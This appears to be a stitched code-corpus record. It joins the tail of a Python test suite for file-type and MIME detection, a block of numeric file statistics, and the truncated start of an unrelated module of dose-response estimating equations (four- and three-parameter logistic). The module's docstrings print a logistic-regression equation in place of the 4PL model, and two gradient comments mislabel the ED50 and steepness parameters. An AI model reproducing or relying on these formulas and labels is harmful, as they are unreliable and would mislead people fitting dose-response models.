test_file = self.get_test_loc('contenttype/code/c/CcccDevStudioAddIn.rc2')
assert 'ascii text' == get_filetype(test_file)
assert 'C' == get_filetype_pygment(test_file)
def test_code_scala(self):
test_file = self.get_test_loc('contenttype/code/scala/Applicative.scala')
assert 'utf-8 unicode text' == get_filetype(test_file)
assert 'Scala' == get_filetype_pygment(test_file)
def test_compiled_elf_exe_32bits(self):
test_file = self.get_test_loc('contenttype/compiled/linux/i686-shash')
assert is_binary(test_file)
assert 'elf 32-bit lsb executable, intel 80386, version 1 (sysv), dynamically linked, interpreter /lib/ld-linux.so.2, for gnu/linux 2.6.4, not stripped' == get_filetype(self.get_test_loc(u'contenttype/compiled/linux/i686-shash'))
assert '' == get_filetype_pygment(test_file)
def test_compiled_elf_exe_64bits(self):
test_file = self.get_test_loc('contenttype/compiled/linux/x86_64-shash')
assert is_binary(test_file)
assert 'elf 64-bit lsb executable, x86-64, version 1 (sysv), dynamically linked, interpreter /lib64/ld-linux-x86-64.so.2, for gnu/linux 2.6.9, not stripped' == get_filetype(self.get_test_loc(u'contenttype/compiled/linux/x86_64-shash'))
assert '' == get_filetype_pygment(test_file)
def test_compiled_elf_so(self):
test_file = self.get_test_loc(u'contenttype/compiled/linux/libssl.so.0.9.7')
assert not is_special(test_file)
assert not is_text(test_file)
assert '' == get_filetype_pygment(test_file)
assert 'application/x-sharedlib' == get_mimetype_file(test_file)
assert 'elf 32-bit lsb shared object, intel 80386, version 1 (sysv), dynamically linked, stripped' == get_filetype(test_file)
assert 'ELF 32-bit LSB shared object, Intel 80386, version 1 (SYSV), dynamically linked, stripped' == get_filetype_file(test_file)
assert '' == get_filetype_pygment(test_file)
def test_compiled_elf_so_2(self):
test_file = self.get_test_loc('contenttype/compiled/linux/libnetsnmpagent.so.5')
assert not is_source(test_file)
assert 'elf 32-bit lsb shared object, intel 80386, version 1 (sysv), dynamically linked, not stripped' == get_filetype(test_file)
assert '' == get_filetype_pygment(test_file)
def test_compiled_flash(self):
test_file = self.get_test_loc('contenttype/compiled/flash/a.swf')
assert is_binary(test_file)
assert 'macromedia flash data, version 7' == get_filetype(test_file)
assert '' == get_filetype_pygment(test_file)
def test_compiled_flash_2(self):
test_file = self.get_test_loc('contenttype/compiled/flash/b.swf')
assert is_binary(test_file)
assert 'macromedia flash data, version 7' == get_filetype(test_file)
assert '' == get_filetype_pygment(test_file)
def test_compiled_flash_swc(self):
test_file = self.get_test_loc('contenttype/compiled/flash/flash-haloclassic.swc.incr')
assert is_binary(test_file)
assert 'data' == get_filetype(test_file)
assert '' == get_filetype_pygment(test_file)
def test_compiled_java_classfile_1(self):
test_file = self.get_test_loc('contenttype/compiled/java/CommonViewerSiteFactory.class')
assert 'compiled java class data, version 46.0 (java 1.2)' == get_filetype(test_file)
assert '' == get_filetype_pygment(test_file)
def test_compiled_java_classfile_2(self):
test_file = self.get_test_loc('contenttype/compiled/java/old.class')
assert is_binary(test_file)
assert 'compiled java class data, version 46.0 (java 1.2)' == get_filetype(test_file)
assert '' == get_filetype_pygment(test_file)
def test_compiled_python_1(self):
test_dir = self.extract_test_zip('contenttype/compiled/python/compiled.zip')
test_file = os.path.join(test_dir, 'command.pyc')
assert 'python 2.5 byte-compiled' == get_filetype(test_file)
assert not is_source(test_file)
assert not is_text(test_file)
assert 'application/octet-stream' == get_mimetype_file(test_file)
assert '' == get_filetype_pygment(test_file)
test_file2 = os.path.join(test_dir, 'contenttype.pyc')
assert is_binary(test_file2)
assert get_pygments_lexer(test_file2) is None
test_file3 = os.path.join(test_dir, 'contenttype.pyo')
assert is_binary(test_file3)
assert get_pygments_lexer(test_file3) is None
test_file4 = os.path.join(test_dir, 'extract.pyc')
assert 'python 2.5 byte-compiled' == get_filetype(test_file4)
assert not is_source(test_file4)
assert not is_text(test_file4)
assert 'application/octet-stream' == get_mimetype_file(test_file4)
assert '' == get_filetype_pygment(test_file4)
def test_compiled_win_dll(self):
test_file = self.get_test_loc(u'contenttype/compiled/win/zlib1.dll')
assert is_winexe(test_file)
assert is_binary(self.get_test_loc('contenttype/compiled/win/zlib1.dll'))
assert '' == get_filetype_pygment(test_file)
def test_compiled_win_exe(self):
test_file = self.get_test_loc(u'contenttype/compiled/win/file.exe')
assert is_winexe(test_file)
assert is_binary(self.get_test_loc('contenttype/compiled/win/file.exe'))
assert '' == get_filetype_pygment(test_file)
def test_config_conf(self):
test_file = self.get_test_loc('contenttype/config/config.conf')
assert 'ascii text, with crlf line terminators' == get_filetype(test_file)
assert '' == get_filetype_pygment(test_file)
def test_config_linux_conf(self):
test_file = self.get_test_loc('contenttype/config/defconfig-ar531x-jffs2')
assert 'linux make config build file (old)' == get_filetype(test_file)
assert not is_source(test_file)
assert is_text(test_file)
assert '' == get_filetype_pygment(test_file)
assert 'linux make config build file (old)' == get_filetype(test_file)
assert 'text/plain' == get_mimetype_file(test_file)
def test_config_text_3(self):
test_file = self.get_test_loc('contenttype/config/wrapper.conf')
assert 'ascii text, with crlf line terminators' == get_filetype(test_file)
assert 'ascii text, with crlf line terminators' == get_filetype(test_file)
assert '' == get_filetype_pygment(test_file)
def test_debug_win_pdb(self):
test_file = self.get_test_loc('contenttype/debug/QTMovieWin.pdb')
assert is_binary(test_file)
assert 'msvc program database ver \\004' == get_filetype(test_file)
assert '' == get_filetype_pygment(test_file)
def test_doc_html(self):
test_file = self.get_test_loc('contenttype/doc/html/contenttype.html')
assert not is_binary(test_file)
assert 'HTML' == get_pygments_lexer(test_file).name
def test_doc_html_2(self):
test_file = self.get_test_loc('contenttype/doc/html/allclasses-frame.html')
assert is_source(test_file)
assert is_text(test_file)
assert 'HTML' == get_filetype_pygment(test_file)
assert 'html document, ascii text' == get_filetype(test_file)
assert 'text/html' == get_mimetype_file(test_file)
assert 'HTML document, ASCII text' == get_filetype_file(test_file)
def test_doc_html_3(self):
test_file = self.get_test_loc('contenttype/doc/html/Label.html')
assert is_source(test_file)
assert is_text(test_file)
assert 'HTML' == get_filetype_pygment(test_file)
assert 'html document, ascii text, with very long lines' == get_filetype(test_file)
assert 'text/html' == get_mimetype_file(test_file)
assert 'HTML document, ASCII text, with very long lines' == get_filetype_file(test_file)
def test_doc_html_4(self):
test_file = self.get_test_loc('contenttype/doc/html/a.htm')
assert not is_binary(test_file)
assert not is_binary(test_file)
assert 'HTML' == get_pygments_lexer(test_file).name
def test_doc_office_word(self):
test_file = self.get_test_loc('contenttype/doc/office/document')
assert not is_archive(test_file)
assert 'microsoft word 2007+' == get_filetype(test_file)
def test_doc_office_word_2(self):
test_file = self.get_test_loc('contenttype/doc/office/document.doc')
assert not is_archive(test_file)
assert 'microsoft word 2007+' == get_filetype(test_file)
def test_doc_office_word_3(self):
test_file = self.get_test_loc('contenttype/doc/office/word.doc')
assert not is_special(test_file)
assert '' == get_filetype_pygment(test_file)
assert 'application/msword' == get_mimetype_file(test_file)
assert get_filetype(test_file).startswith('composite document file v2 document')
assert get_filetype_file(test_file).startswith('Composite Document File V2 Document')
def test_docx_office_word(self):
test_file = self.get_test_loc('contenttype/doc/office/word.docx')
assert 'application/vnd.openxmlformats-officedocument.wordprocessingml.document' == get_mimetype_file(test_file)
assert is_archive(test_file)
assert is_compressed(test_file)
assert not contains_text(test_file)
def test_pptx_office_is_archive(self):
test_file = self.get_test_loc('contenttype/doc/office/power.pptx')
assert is_archive(test_file)
assert is_compressed(test_file)
assert not contains_text(test_file)
def test_doc_office_excel_xlsx(self):
test_file = self.get_test_loc('contenttype/doc/office/excel.xlsx')
assert 'application/vnd.openxmlformats-officedocument.spreadsheetml.sheet' == get_mimetype_file(test_file)
assert is_archive(test_file)
assert is_compressed(test_file)
assert not contains_text(test_file)
def test_doc_office_excel_xls(self):
test_file = self.get_test_loc('contenttype/doc/office/excel.xls')
assert 'application/vnd.ms-excel' == get_mimetype_file(test_file)
def test_doc_office_powerpoint_pptx(self):
test_file = self.get_test_loc('contenttype/doc/office/power.pptx')
assert 'application/vnd.openxmlformats-officedocument.presentationml.presentation' == get_mimetype_file(test_file)
assert is_archive(test_file)
assert is_compressed(test_file)
assert not contains_text(test_file)
def test_doc_office_powerpoint_ppt(self):
test_file = self.get_test_loc('contenttype/doc/office/power.ppt')
assert 'application/vnd.ms-powerpoint' == get_mimetype_file(test_file)
def test_doc_office_visio(self):
test_file = self.get_test_loc('contenttype/doc/office/Glitch-ERD.vsd')
assert 'application/vnd.ms-office' == get_mimetype_file(test_file)
assert not is_text(test_file)
assert is_binary(test_file)
def test_doc_pdf_1(self):
test_file = self.get_test_loc('contenttype/doc/pdf/a.pdf')
assert is_pdf(test_file)
assert is_pdf_with_text(test_file)
assert 'pdf document, version 1.2' == get_filetype(test_file)
assert not is_media(test_file)
assert is_binary(test_file)
def test_doc_pdf_2(self):
test_file = self.get_test_loc('contenttype/doc/pdf/notpdf.pdf')
assert not is_pdf_with_text(test_file)
def test_doc_pdf_3(self):
test_file = self.get_test_loc('contenttype/doc/pdf/pdf.pdf')
assert is_pdf(test_file)
assert is_pdf_with_text(test_file)
assert 'pdf document, version 1.4' == get_filetype(test_file)
def test_doc_postscript_1(self):
test_file = self.get_test_loc('contenttype/doc/postscript/doc.ps')
assert is_text(test_file)
assert not is_binary(test_file)
def test_doc_postscript_2(self):
test_file = self.get_test_loc('contenttype/doc/postscript/a.ps')
assert not is_binary(test_file)
assert not is_media(test_file)
def test_doc_postscript_eps(self):
test_file = self.get_test_loc('contenttype/doc/postscript/Image1.eps')
assert is_binary(test_file)
assert 'application/octet-stream' == get_mimetype_file(test_file)
assert get_filetype_file(test_file).startswith('DOS EPS Binary File Postscript')
def test_doc_xml(self):
test_file = self.get_test_loc('contenttype/doc/xml/simple.xml')
assert not is_binary(test_file)
assert 'ascii text' == get_filetype(test_file)
def test_doc_xml_2(self):
test_file = self.get_test_loc('contenttype/doc/xml/some.xml')
assert not is_binary(test_file)
assert 'xml document text' == get_filetype(test_file)
def test_doc_xml_3(self):
test_file = self.get_test_loc('contenttype/doc/xml/somespring.xml')
assert not is_binary(test_file)
assert 'xml document text' == get_filetype(test_file)
def test_media_audio_aif(self):
test_file = self.get_test_loc('contenttype/media/a.aif')
assert is_media(test_file)
assert is_binary(test_file)
assert is_media(self.get_test_loc('contenttype/media/a.aiff'))
assert is_binary(self.get_test_loc('contenttype/media/a.aiff'))
def test_media_audio_au(self):
test_file = self.get_test_loc('contenttype/media/a.au')
assert is_media(test_file)
assert is_binary(test_file)
def test_media_audio_flac(self):
test_file = self.get_test_loc('contenttype/media/a.flac')
assert is_media(test_file)
assert is_binary(test_file)
def test_media_audio_mp3(self):
test_file = self.get_test_loc('contenttype/media/a.mp3')
assert is_media(test_file)
assert is_binary(test_file)
assert contains_text(test_file)
def test_media_audio_wav(self):
test_file = self.get_test_loc('contenttype/media/a.wav')
assert is_media(test_file)
assert is_binary(test_file)
def test_media_image_bmp_1(self):
test_file = self.get_test_loc('contenttype/media/Image1.bmp')
assert is_media(test_file)
assert is_binary(test_file)
def test_media_image_bmp_2(self):
test_file = self.get_test_loc('contenttype/media/TBarLrge.bmp')
assert 'pc bitmap, windows 3.x format, 400 x 32 x 4' == get_filetype(test_file)
def test_media_image_bmp_3(self):
test_file = self.get_test_loc('contenttype/media/TBarMedm.bmp')
assert 'pc bitmap, windows 3.x format, 210 x 16 x 4' == get_filetype(test_file)
def test_media_image_dib(self):
test_file = self.get_test_loc('contenttype/media/Image1.dib')
assert is_media(test_file)
assert is_binary(test_file)
def test_media_image_gif(self):
test_file = self.get_test_loc('contenttype/media/Image1.gif')
assert is_media(test_file)
assert is_binary(test_file)
assert not contains_text(test_file)
def test_media_image_ico(self):
test_file = self.get_test_loc('contenttype/media/Image1.ico')
assert is_media(test_file)
assert is_binary(test_file)
def test_media_image_iff(self):
test_file = self.get_test_loc('contenttype/media/Image1.iff')
assert is_media(test_file)
assert is_binary(test_file)
def test_media_image_img(self):
# FIXME: .img files are more complex
test_file = self.get_test_loc('contenttype/media/Image1.img')
assert is_binary(test_file)
assert get_filetype_file(test_file).startswith('GEM Image data')
assert 'application/octet-stream' == get_mimetype_file(test_file)
assert not get_mimetype_python(test_file)
assert is_media(test_file)
def test_media_image_jif(self):
test_file = self.get_test_loc('contenttype/media/Image1.jif')
assert is_media(test_file)
assert is_binary(test_file)
def test_media_image_jpeg(self):
test_file = self.get_test_loc('contenttype/media/Image1.jpeg')
assert is_media(test_file)
assert is_binary(test_file)
assert not contains_text(test_file)
def test_media_image_jpg(self):
test_file = self.get_test_loc('contenttype/media/Image1.jpg')
assert is_media(test_file)
assert is_binary(test_file)
assert not contains_text(test_file)
def test_media_image_pbm(self):
test_file = self.get_test_loc('contenttype/media/Image1.pbm')
assert is_media(test_file)
assert not is_binary(test_file)
def test_media_image_ppm(self):
test_file = self.get_test_loc('contenttype/media/Image1.ppm')
assert not is_binary(test_file)
# this is text
assert is_media(test_file)
def test_media_image_pcx(self):
test_file = self.get_test_loc('contenttype/media/Image1.pcx')
assert is_media(test_file)
assert is_binary(test_file)
def test_media_image_photoshop(self):
test_file = self.get_test_loc('contenttype/media/Image1.psd')
assert is_media(test_file)
assert is_binary(test_file)
def test_media_image_png(self):
test_file = self.get_test_loc('contenttype/media/a.png')
assert is_media(test_file)
assert is_binary(test_file)
assert not contains_text(test_file)
def test_media_image_psp(self):
test_file = self.get_test_loc('contenttype/media/Image1.psp')
assert is_media(test_file)
assert is_binary(test_file)
def test_media_image_ras(self):
test_file = self.get_test_loc('contenttype/media/Image1.ras')
assert is_media(test_file)
assert is_binary(test_file)
def test_media_image_svg(self):
test_file = self.get_test_loc('contenttype/media/drawing.svg')
assert not is_binary(test_file)
assert is_media(test_file)
assert '' == get_filetype_pygment(test_file)
assert 'SVG Scalable Vector Graphics image' == get_filetype_file(test_file)
assert not is_source(test_file)
def test_media_image_tgg(self):
test_file = self.get_test_loc('contenttype/media/Image1.tga')
assert is_media(test_file)
assert is_binary(test_file)
def test_media_image_tif(self):
test_file = self.get_test_loc('contenttype/media/Image1.tif')
assert is_media(test_file)
assert is_binary(test_file)
def test_media_image_windows_metafile(self):
test_file = self.get_test_loc('contenttype/media/Image1.emf')
assert 'application/octet-stream' == get_mimetype_file(test_file)
assert get_filetype_file(test_file).startswith('Windows Enhanced Metafile')
assert not get_mimetype_python(test_file)
assert is_media(test_file)
assert is_binary(test_file)
def test_media_video_mpeg(self):
test_file = self.get_test_loc('contenttype/media/a4.mp4')
assert is_media(test_file)
assert is_binary(test_file)
assert contains_text(test_file)
def test_media_video_mpg(self):
test_file = self.get_test_loc('contenttype/media/a4.mpg')
assert is_media(test_file)
assert is_binary(test_file)
assert contains_text(test_file)
def test_media_video_mp2(self):
test_file = self.get_test_loc('contenttype/media/a.mp2')
assert is_media(test_file)
assert is_binary(test_file)
assert contains_text(test_file)
def test_media_video_msft_avi(self):
test_file = self.get_test_loc('contenttype/media/a.avi')
assert is_media(test_file)
assert is_binary(test_file)
def test_media_video_msft_wmf(self):
test_file = self.get_test_loc('contenttype/media/Image1.wmf')
assert is_media(test_file)
assert is_binary(test_file)
def test_media_video_msft_wmv(self):
test_file = self.get_test_loc('contenttype/media/mov.wvm.wmv')
assert is_media(test_file)
assert is_binary(test_file)
test_file = self.get_test_loc('contenttype/media/Movie.wmv')
assert is_media(test_file)
assert is_binary(test_file)
test_file = self.get_test_loc('contenttype/media/Movie_0001.wmv')
assert is_media(test_file)
assert is_binary(test_file)
test_file = self.get_test_loc('contenttype/media/Movie_0002.wmv')
assert is_media(test_file)
assert is_binary(test_file)
def test_media_video_ogg(self):
test_file = self.get_test_loc('contenttype/media/a.ogg')
assert is_media(test_file)
assert is_binary(test_file)
def test_media_video_theora_ogg(self):
test_file = self.get_test_loc('contenttype/media/a.theo.ogg')
assert is_media(test_file)
assert is_binary(test_file)
def test_package_debian(self):
test_file = self.get_test_loc('contenttype/package/wget-el_0.5.0-8_all.deb')
assert 'debian binary package (format 2.0)' == get_filetype(test_file)
assert is_binary(test_file)
assert is_archive(test_file)
assert not contains_text(test_file)
def test_package_java_jar(self):
test_file = self.get_test_loc('contenttype/package/ant-jsch-1.7.0.jar')
assert 'java archive data (jar)' == get_filetype(test_file)
assert is_binary(test_file)
assert is_compressed(test_file)
assert is_archive(test_file)
assert not contains_text(test_file)
def test_package_java_jar_as_zip(self):
test_file = self.get_test_loc('contenttype/package/ant.zip')
assert 'java archive data (jar)' == get_filetype(test_file)
assert is_binary(test_file)
assert is_compressed(test_file)
assert is_archive(test_file)
assert not contains_text(test_file)
def test_package_java_war(self):
test_file = self.get_test_loc('contenttype/package/c.war')
assert 'zip archive data, at least v1.0 to extract' == get_filetype(test_file)
assert is_binary(test_file)
assert is_compressed(test_file)
assert is_archive(test_file)
assert not contains_text(test_file)
def test_package_python_egg(self):
test_file = self.get_test_loc('contenttype/package/TicketImport-0.7a-py2.5.egg')
assert 'zip archive data, at least v2.0 to extract' == get_filetype(test_file)
assert is_binary(test_file)
assert is_compressed(test_file)
assert is_archive(test_file)
assert not contains_text(test_file)
def test_package_rpm(self):
test_file = self.get_test_loc('contenttype/package/wget-1.11.4-3.fc11.i586.rpm')
assert 'rpm v3.0 bin i386/x86_64' == get_filetype(test_file)
assert is_binary(test_file)
assert is_archive(test_file)
assert is_compressed(test_file)
assert not contains_text(test_file)
def test_package_rubygem(self):
test_file = self.get_test_loc('contenttype/package/rubygems-update-1.4.1.gem')
assert 'posix tar archive' == get_filetype(test_file)
assert is_binary(test_file)
assert is_compressed(test_file)
assert is_archive(test_file)
assert not contains_text(test_file)
def test_script_bash(self):
test_file = self.get_test_loc('contenttype/script/test.sh')
assert 'posix shell script, ascii text executable' == get_filetype(test_file)
assert 'Bash' == get_filetype_pygment(test_file)
def test_script_bash_makelinks(self):
test_file = self.get_test_loc('contenttype/script/makelinks')
assert is_source(test_file)
assert 'Bash' == get_filetype_pygment(test_file)
def test_script_windows_bat(self):
test_file = self.get_test_loc('contenttype/script/build_w32vc.bat')
assert 'dos batch file, ascii text' == get_filetype(test_file)
assert 'Batchfile' == get_filetype_pygment(test_file)
def test_script_windows_bat_2(self):
test_file = self.get_test_loc('contenttype/script/zip_src.bat')
assert 'ascii text, with crlf line terminators' == get_filetype(test_file)
assert 'Batchfile' == get_filetype_pygment(test_file)
def test_script_install(self):
test_file = self.get_test_loc('contenttype/script/install')
assert 'ascii text' == get_filetype(test_file)
assert '' == get_filetype_pygment(test_file)
def test_text_crashing(self):
# these used to make libmagic crash somehow
test_file = self.get_test_loc('contenttype/text/crashing-a.txt')
assert 'ASCII text' == get_filetype_file(test_file)
test_file = self.get_test_loc('contenttype/text/crashing-z.txt')
assert 'ASCII text' == get_filetype_file(test_file)
assert '' == get_filetype_pygment(test_file)
def test_text(self):
test_file = self.get_test_loc('contenttype/text/x11-xconsortium_text.txt')
assert not is_binary(test_file)
assert not is_archive(test_file)
assert '' == get_filetype_pygment(test_file)
def test_text_license_copying(self):
test_file = self.get_test_loc('contenttype/text/COPYING')
assert 'ascii text' in get_filetype(test_file)
assert not is_source(test_file)
assert is_text(test_file)
assert '' == get_filetype_pygment(test_file)
assert 'text/plain' == get_mimetype_file(test_file)
def test_text_license_credits(self):
# FIXME
test_file = self.get_test_loc('contenttype/text/CREDITS')
assert 'iso-8859 text' == get_filetype(test_file)
assert is_text(test_file)
assert not is_source(test_file)
assert '' == get_filetype_pygment(test_file)
assert 'ISO-8859 text' == get_filetype_file(test_file)
assert 'text/plain' == get_mimetype_file(test_file)
def test_text_license_gpl(self):
test_file = self.get_test_loc('contenttype/text/GPL.txt')
assert not is_source(test_file)
assert '' == get_filetype_pygment(test_file)
def test_text_log(self):
test_file = self.get_test_loc('contenttype/text/windowserver.log')
assert not is_source(test_file)
assert is_text(test_file)
assert '' == get_filetype_pygment(test_file)
assert 'ascii text' == get_filetype(test_file)
assert 'ASCII text' == get_filetype_file(test_file)
assert 'text/plain' == get_mimetype_file(test_file)
assert '' == get_filetype_pygment(test_file)
def test_is_standard_include(self):
assert is_standard_include('<built-in>')
assert is_standard_include('/usr/lib/this.h')
assert is_standard_include('/usr/include/this.h')
def test_text_iso_text_changelog_is_not_iso_cdrom(self):
test_file = self.get_test_loc('contenttype/text/ChangeLog')
assert 'Non-ISO extended-ASCII text' == get_filetype_file(test_file)
assert '' == get_filetype_pygment(test_file)
@expectedFailure
def test_text_rsync_file_is_not_octet_stream(self):
# this is a libmagic bug: http://bugs.gw.com/view.php?id=473
test_file = self.get_test_loc('contenttype/text/wildtest.txt')
assert 'data' != get_filetype_file(test_file)
assert 'octet' not in get_mimetype_file(test_file)
def test_rgb_stream_is_binary(self):
# this is a binaryornot bug: https://github.com/audreyr/binaryornot/issues/10
test_file = self.get_test_loc('contenttype/binary/pixelstream.rgb')
assert 'data' == get_filetype_file(test_file)
assert 'application/octet-stream' == get_mimetype_file(test_file)
assert is_binary(test_file)
def test_large_text_file_is_data(self):
test_file = self.get_test_loc('contenttype/data/nulls.txt')
assert is_data(test_file)
assert '' == get_filetype_pygment(test_file)
def test_is_js_map_for_css(self):
test_file = self.get_test_loc('contenttype/build/ar-ER.css.map')
assert is_js_map(test_file)
assert '' == get_filetype_pygment(test_file)
def test_is_js_map_for_js(self):
test_file = self.get_test_loc('contenttype/build/ar-ER.js.map')
assert is_js_map(test_file)
assert '' == get_filetype_pygment(test_file)
def test_test_is_js_map_for_binary(self):
test_file = self.get_test_loc('contenttype/build/binary.js.map')
assert not is_js_map(test_file)
assert '' == get_filetype_pygment(test_file)
def test_test_is_js_map_for_makefile(self):
test_file = self.get_test_loc('contenttype/build/Makefile')
assert not is_js_map(test_file)
assert '' == get_filetype_pygment(test_file)
| 45.190515
| 243
| 0.7033
| 7,895
| 55,268
| 4.592527
| 0.076631
| 0.154449
| 0.138232
| 0.067957
| 0.848585
| 0.823046
| 0.790943
| 0.764824
| 0.741822
| 0.669066
| 0
| 0.008029
| 0.199989
| 55,268
| 1,222
| 244
| 45.227496
| 0.81201
| 0.034215
| 0
| 0.497992
| 0
| 0.003012
| 0.205894
| 0.119465
| 0
| 0
| 0
| 0.000818
| 0.584337
| 1
| 0.163655
| false
| 0
| 0.016064
| 0
| 0.181727
| 0.001004
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
b21118449816cb9e49ae528b8e2ba4c4fcf49b6b
| 22,695
|
py
|
Python
|
delicatessen/estimating_equations/dose_response.py
|
pzivich/Deli
|
761aa51c6949334b59fffb185be4266177454b6c
|
[
"MIT"
] | null | null | null |
delicatessen/estimating_equations/dose_response.py
|
pzivich/Deli
|
761aa51c6949334b59fffb185be4266177454b6c
|
[
"MIT"
] | null | null | null |
delicatessen/estimating_equations/dose_response.py
|
pzivich/Deli
|
761aa51c6949334b59fffb185be4266177454b6c
|
[
"MIT"
] | null | null | null |
import numpy as np
#################################################################
# Dose-Response Estimating Equations
def ee_4p_logistic(theta, X, y):
r"""Default stacked estimating equation estimating equations for the four parameter logistic model (4PL). 4PL is
often used for dose-response and bioassay analyses. The estimating equations are
.. math::
\sum_i^n \psi(Y_i, X_i, \theta) = \sum_i^n (Y_i - expit(X_i^T \theta)) X_i = 0
\sum_i^n \psi(Y_i, X_i, \theta) = \sum_i^n (Y_i - expit(X_i^T \theta)) X_i = 0
\sum_i^n \psi(Y_i, X_i, \theta) = \sum_i^n (Y_i - expit(X_i^T \theta)) X_i = 0
\sum_i^n \psi(Y_i, X_i, \theta) = \sum_i^n (Y_i - expit(X_i^T \theta)) X_i = 0
Here, theta is a 1-by-4 array, where 4 are the 4 parameters of the 4PL. The first theta corresponds to lower limit,
the second corresponds to the effective dose (ED50), the third corresponds to the steepness of the curve, and the
fourth corresponds to the upper limit.
Note
----
All provided estimating equations are meant to be wrapped inside a user-specified function. Throughtout, these
user-defined functions are defined as ``psi``.
Parameters
----------
theta : ndarray, list, vector
Theta in this case consists of 4 values. In general, starting values ``>0`` are better choices for the 4PL model
X : ndarray, list, vector
1-dimensional vector of n dose values. No missing data should be included (missing data may cause unexpected
behavior).
y : ndarray, list, vector
1-dimensional vector of n response values. No missing data should be included (missing data may cause
unexpected behavior).
Returns
-------
array :
Returns a 4-by-n NumPy array evaluated for the input theta, y, X
Examples
--------
Construction of a estimating equation(s) with ``ee_4p_logistic`` should be done similar to the following
>>> from delicatessen import MEstimator
>>> from delicatessen.data import load_inderjit
>>> from delicatessen.estimating_equations import ee_4p_logistic
For demonstration, we use dose-response data from Inderjit et al. (2002), which can be loaded from ``delicatessen``
directly.
>>> d = load_inderjit() # Loading array of data
>>> dose_data = d[:, 1] # Dose data
>>> resp_data = d[:, 0] # Response data
Defining psi, or the stacked estimating equations
>>> def psi(theta):
>>> return ee_4p_logistic(theta=theta, X=dose_data, y=resp_data)
The 4PL model and others are harder to optimize compared to other estimating equations. Namely, the optimizer is
not aware of implicit bounds on the parameters. To reduce non-convergence issues, we can give the root-finder good
starting values.
For the 4PL, the upper limit should *always* be greater than the lower limit. Second, the ED50 should be between
the lower and upper limits. Third, the sign for the steepness depends on whether the response declines (positive)
or the response increases (negative). Finally, some solvers may be better suited to the problem, so try a few
different options.
Here, we use some general starting values that should perform well in many cases. For the lower-bound, give the
minimum response value as the initial. For ED50, give the mid-point between the maximum response and the minimum
response. The initial value for steepness is more difficult. Ideally, we would give a starting value of zero, but
that will fail in this example. Giving a small positive starting value works in this example. For the upper-bound,
give the maximum response value as the initial. Finally, we use the ``lm`` solver.
Note
----
To summarize the recommendations, be sure to examine your data (e.g., scatterplot). This will help to determine the
initial starting values for the root-finding procedure. Otherwise, you may come across a convergence error.
>>> estr = MEstimator(psi, init=[np.min(resp_data),
>>> (np.max(resp_data)+np.min(resp_data)) / 2,
>>> (np.max(resp_data)+np.min(resp_data)) / 2,
>>> np.max(resp_data)])
>>> estr.estimate(solver='lm')
Inspecting the parameter estimates, variance, and confidence intervals
>>> estr.theta
>>> estr.variance
>>> estr.confidence_intervals()
Inspecting the parameter estimates
>>> estr.theta[0] # lower limit
>>> estr.theta[1] # ED(50)
>>> estr.theta[2] # steepness
>>> estr.theta[3] # upper limit
References
----------
Ritz C, Baty F, Streibig JC, & Gerhard D. (2015). Dose-response analysis using R. *PloS One*, 10(12), e0146021.
An H, Justin TL, Aubrey GB, Marron JS, & Dittmer DP. (2019). dr4pl: A Stable Convergence Algorithm for the 4
Parameter Logistic Model. *R J.*, 11(2), 171.
Inderjit, Streibig JC, & Olofsdotter M. (2002). Joint action of phenolic acid mixtures and its significance in
allelopathy research. *Physiologia Plantarum*, 114(3), 422-428.
"""
# Creating rho to cut down on typing
rho = (X / theta[1]) ** theta[2]
# Generalized 4PL model function for y-hat
fx = theta[0] + (theta[3] - theta[0]) / (1 + rho)
# Using a special implementatin of natural log here
nested_log = np.log(X / theta[1], # ... to avoid dose=0 issues only take log
where=0 < X) # ... where dose>0 (otherwise puts zero in place)
# Calculate the derivatives for the gradient
deriv = np.array((1 - 1/(1+rho), # Gradient for lower limit
(theta[3]-theta[0])*theta[2]/theta[1]*rho/(1+rho)**2, # Gradient for steepness
(theta[3] - theta[0]) * nested_log * rho / (1 + rho)**2, # Gradient for ED50
1 / (1 + rho)), ) # Gradient for upper limit
# Compute gradient and return for each i
return -2*(y-fx)*deriv
def ee_3p_logistic(theta, X, y, lower):
r"""Default stacked estimating equation estimating equations for the three parameter logistic model (3PL). 3PL is
often used for dose-response and bioassay analyses. The estimating equations are
.. math::
\sum_i^n \psi(Y_i, X_i, \theta) = \sum_i^n (Y_i - expit(X_i^T \theta)) X_i = 0
\sum_i^n \psi(Y_i, X_i, \theta) = \sum_i^n (Y_i - expit(X_i^T \theta)) X_i = 0
\sum_i^n \psi(Y_i, X_i, \theta) = \sum_i^n (Y_i - expit(X_i^T \theta)) X_i = 0
Here, theta is a 1-by-3 array, where 3 are the 3 parameters of the 3PL. The first theta corresponds to the
effective dose (ED50), the second corresponds to the steepness of the curve, and the third corresponds to the upper
limit. The lower limit is pre-specified by the user (and is no longer estimated)
Note
----
All provided estimating equations are meant to be wrapped inside a user-specified function. Throughtout, these
user-defined functions are defined as ``psi``.
Parameters
----------
theta : ndarray, list, vector
Theta in this case consists of 3 values. In general, starting values ``>0`` are better choices for the 3PL model
X : ndarray, list, vector
1-dimensional vector of n dose values. No missing data should be included (missing data may cause unexpected
behavior).
y : ndarray, list, vector
1-dimensional vector of n response values. No missing data should be included (missing data may cause
unexpected behavior).
lower : int, float
Set value for the lower limit.
Returns
-------
array :
Returns a 3-by-n NumPy array evaluated for the input theta, y, X
Examples
--------
Construction of a estimating equation(s) with ``ee_3p_logistic`` should be done similar to the following
>>> from delicatessen import MEstimator
>>> from delicatessen.data import load_inderjit
>>> from delicatessen.estimating_equations import ee_3p_logistic
For demonstration, we use dose-response data from Inderjit et al. (2002), which can be loaded from ``delicatessen``
directly.
>>> d = load_inderjit() # Loading array of data
>>> dose_data = d[:, 1] # Dose data
>>> resp_data = d[:, 0] # Response data
Since there is a natural lower-bound of 0 for root growth, we set ``lower=0``. Defining psi, or the stacked
estimating equations
>>> def psi(theta):
>>> return ee_3p_logistic(theta=theta, X=dose_data, y=resp_data,
>>> lower=0)
The 3PL model and others are harder to optimize compared to other estimating equations. Namely, the optimizer is
not aware of implicit bounds on the parameters. To reduce non-convergence issues, we can give the root-finder good
starting values.
For the 3PL, the upper limit should *always* be greater than the set lower limit. Second, the ED50 should be between
the lower and upper limits. Third, the sign for the steepness depends on whether the response declines (positive)
or the response increases (negative). Finally, some solvers may be better suited to the problem, so try a few
